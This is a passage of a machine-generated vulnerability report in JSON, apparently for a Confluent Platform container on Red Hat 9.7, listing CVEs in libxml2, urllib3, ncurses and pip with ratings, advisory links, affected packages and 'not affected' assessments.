          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-45322",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is \"I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45322"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/10/06/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45322"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/344"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/583"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45322"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45322"
        }
      ],
      "published": "2023-10-06T22:15:11+00:00",
      "updated": "2025-11-03T21:16:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2023-45803",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        200
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-45803"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2132"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-45803"
        },
        {
          "url": "https://bugzilla.redhat.com/2246840"
        },
        {
          "url": "https://bugzilla.redhat.com/2257028"
        },
        {
          "url": "https://bugzilla.redhat.com/2257854"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246840"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45803"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2132.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:11238"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-45803.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2988.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6473-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7762-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
        }
      ],
      "published": "2023-10-17T20:15:10+00:00",
      "updated": "2025-11-03T22:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ]
    },
    {
      "id": "CVE-2023-50495",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-50495"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-50495"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html"
        },
        {
          "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00029.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240119-0008/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6684-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
        }
      ],
      "published": "2023-12-12T15:15:07+00:00",
      "updated": "2025-11-04T19:16:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "6.2-12.20210508.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "6.2-12.20210508.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-5752",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        77
      ],
      "description": "When installing a package from a Mercurial VCS URL (ie \"pip install hg+...\") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the \"hg clone\" call (ie \"--config\"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-5752"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-5752"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2023-228.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/389cb799d0da9a840749fcd14878928467ed49b4"
        },
        {
          "url": "https://github.com/pypa/pip/pull/12306"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00028.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ/"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5752"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
        }
      ],
      "published": "2023-10-25T18:17:44+00:00",
      "updated": "2025-11-03T18:15:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
